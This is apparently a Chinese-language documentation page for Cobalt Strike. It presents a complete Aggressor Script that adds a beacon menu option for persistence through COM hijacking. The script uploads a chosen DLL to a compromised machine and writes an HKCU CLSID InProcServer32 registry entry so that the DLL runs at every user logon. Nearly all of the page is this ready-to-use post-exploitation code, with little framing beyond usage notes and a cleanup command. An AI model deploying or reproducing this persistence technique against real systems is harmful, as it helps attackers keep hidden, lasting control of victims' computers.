C
C
Cobalt Strike
搜索文档…
COM劫持利用脚本编写
一个简单的通过com劫持达到持久化的一个脚本
1
sub Show_COM_GUI{
2
$bid = $1;
3
$dialog = dialog("COM劫持用户登陆", %(),
4
lambda({
5
bupload($bid, $3['file']);
6
bmv($bid,$3['DLL_NAME'],$3['DLL_PATH'])
7
bpowerpick($bid,'Remove-Item "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}" -Recurse');
8
bpowerpick($bid,'New-Item -Type Directory "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}"');
9
#brun($bid,"reg add \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /t REG_SZ /d \"".$3['DLL_PATH'].$3['DLL_NAME']"\" /f")
10
bpowerpick($bid,"New-Item -itemType String 'HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32' -Value \"".$3['DLL_PATH'].$3['DLL_NAME']"\" ");
11
bpowerpick($bid,'Set-ItemProperty "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32" -name ThreadingModel -value Both');
12
13
}));
14
dialog_description($dialog, "劫持任意用户登陆,任意用户登陆时将触发DLL. x64位用x64 dll,x86位用x86 dll。清除劫持:Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse");
15
drow_file($dialog, "file", "本地DLL路径: ");
16
drow_text($dialog, "DLL_NAME", "DLL文件名: ");
17
drow_text($dialog, "DLL_PATH", "上传路径+DLL文件名: ");
18
dbutton_action($dialog, "Go");
19
dialog_show($dialog);
20
}
21
22
popup beacon_bottom {
23
item "&COM持久化" {
24
local('$bid');
25
foreach $bid ($1) {
26
Show_COM_GUI($bid);
27
}
28
29
}
30
}
Copied!
通过com劫持任意用户登陆达到持久化,每当有用户登陆时就会触发dll。x32位系统使用x32位dll,x64位用x64位dll。
复制链接